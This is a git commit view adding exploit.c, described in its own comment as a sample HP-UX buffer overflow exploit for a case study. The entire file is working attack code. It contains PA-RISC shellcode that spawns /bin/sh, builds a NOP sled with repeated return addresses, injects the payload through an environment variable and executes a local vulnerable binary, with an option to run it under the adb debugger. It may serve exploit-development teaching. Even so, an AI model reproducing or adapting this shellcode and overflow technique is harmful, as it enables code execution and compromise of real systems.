summaryrefslogtreecommitdiff
path: root/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
diff options
context:
space:
mode:
authorRoot THC2026-02-24 12:42:47 +0000
committerRoot THC2026-02-24 12:42:47 +0000
commitc9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
treeaefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/tmp/hpux-tools/sample-one/exploit.c
parent073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
initial
Diffstat (limited to 'other/shellkit/tmp/hpux-tools/sample-one/exploit.c')
-rw-r--r--other/shellkit/tmp/hpux-tools/sample-one/exploit.c123
1 files changed, 123 insertions, 0 deletions
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/exploit.c b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
new file mode 100644
index 0000000..11dc23c
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
@@ -0,0 +1,123 @@
1/*
2 * Sample exploit for HP-UX buffer overflows case study
3 */
4#include <stdio.h>
5#include <unistd.h>
6
7
8char shellcode[]=
9"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
10"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
11"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";
12
13#define BUFFER_SIZE 180
14#define STACK_DSO -84
15#define NOP 0x0b390280
16#define PAD 0
17#define ALIGN 8
18#define ADB_PATH "/usr/bin/adb"
19#define VULNVAR "VULNBUF="
20#define MORE 1
21
22
23unsigned long get_sp(void)
24{
25 __asm__("copy %sp,%ret0 \n");
26}
27
28int main(int argc, char **argv) {
29int i, dso, align, padd, buf_size, adb, more;
30char *buf, *ptr;
31unsigned long retaddr;
32
33
34dso = STACK_DSO;
35align = ALIGN;
36padd = PAD;
37buf_size = BUFFER_SIZE;
38retaddr = 0;
39more = MORE;
40
41
42
43
44while ((i = getopt(argc, argv,
45 "Dd:b:r:o:a:p:m:")) != EOF) {
46 switch (i) {
47 case 'd':
48 dso=(int) strtol(optarg, NULL, 0);
49 break;
50 case 'm':
51 more+=(int) strtol(optarg, NULL, 0);
52 break;
53 case 'b':
54 buf_size=(int)strtol(optarg, NULL, 0);
55 break;
56 case 'r':
57 retaddr = strtoul(optarg, NULL, 0);
58 break;
59 case 'a':
60 align = (int) strtol(optarg, NULL, 0);
61 break;
62 case 'p':
63 padd = (int) strtol(optarg, NULL, 0);
64 break;
65 case 'D':
66 adb = 1;
67 break;
68 default:
69 fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] "
70 "[-r return_address]"
71 "[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]);
72 exit(1);
73 break;
74 }
75}
76
77
78buf=(char *)calloc(strlen(VULNVAR) + buf_size
79 + sizeof(unsigned long)*more + 1, 1);
80ptr=buf;
81if (!buf) {
82 perror("calloc");
83 exit(1);
84}
85
86fprintf(stderr,"our stack %X\n",get_sp());
87if (!retaddr)
88 retaddr=get_sp()- dso + 3;
89fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i"
90 " buf_len: %i dso: %i more: %i\n",
91 retaddr, padd, align, buf_size, dso, more);
92
93strcpy(buf, VULNVAR);
94ptr+=strlen(VULNVAR);
95for(i=0;i<align; i++) *ptr++='A'; // fill in alignment
96
97for(i=0;i<(buf_size-strlen(shellcode)-align-padd)/4;i++) { // fill in some nops
98 *ptr++=(NOP>>24)&0xff;
99 *ptr++=(NOP>>16)&0xff;
100 *ptr++=(NOP>>8)&0xff;
101 *ptr++=(NOP)&0xff;
102}
103
104strcat(buf, shellcode); // append shellcode
105ptr+=strlen(shellcode);
106
107for(i=0;i<padd; i++) *ptr++='B'; // padd
108
109for (i=0;i<more ; i++) {
110 *ptr++=(retaddr>>24)&0xff;
111 *ptr++=(retaddr>>16)&0xff;
112 *ptr++=(retaddr>>8)&0xff;
113 *ptr++=(retaddr)&0xff;
114}
115fprintf(stderr,"buflen is %i\n", strlen(buf));
116putenv(buf,1);
117if (adb)
118 execl(ADB_PATH,"adb","vuln", NULL);
119else
120 execl("./vuln","vuln",buf, NULL);
121perror("execl");
122return 0; // uff
123}